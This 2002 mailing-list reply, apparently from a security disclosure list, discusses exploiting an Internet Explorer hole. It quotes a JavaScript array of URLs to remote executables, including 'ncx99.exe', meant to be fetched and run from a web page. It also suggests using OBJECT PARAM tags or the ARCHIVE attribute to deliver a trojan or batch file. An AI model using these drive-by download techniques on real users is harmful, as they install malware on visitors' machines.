Re: Rather large MSIE-hole

From: Joerg Over (overat_private)
Date: Fri Mar 15 2002 - 01:27:34 PST


    Hello ...
    
    What about, generally, not tackling the programName array trying to stuff
    params into it, but the <OBJECT> instead?
    
    At 17:48 14.03.02 -0500 you wrote:
    ->Another thought... will this bug run an executable from a web page? If 
    ->so you could just make your own binary to do whatever you wanted. Like 
    ->http://mysiteathome.com/malware.exe or something along those lines. I 
    ->would HOPE that it asks to save the file to disk or even better ignore 
    ->it altogether. Maybe try something like:
    ->
    ->var programName=new Array(
    ->    'http://mysiteathome.com/ncx99.exe',
    ->    'http://someothersite.com/ncx99.exe',
    ->);
    
    
    One could maybe try the <PARAM NAME=> tag to pass parameters. Dunno how
    that's transported to the object, though.
    Another attempt might be using the ARCHIVE attribute of the OBJECT to
    download the trojan (or batch file if you will, as has been proposed
    here), so you don't need params.
    
    
    greetings, -jo
    


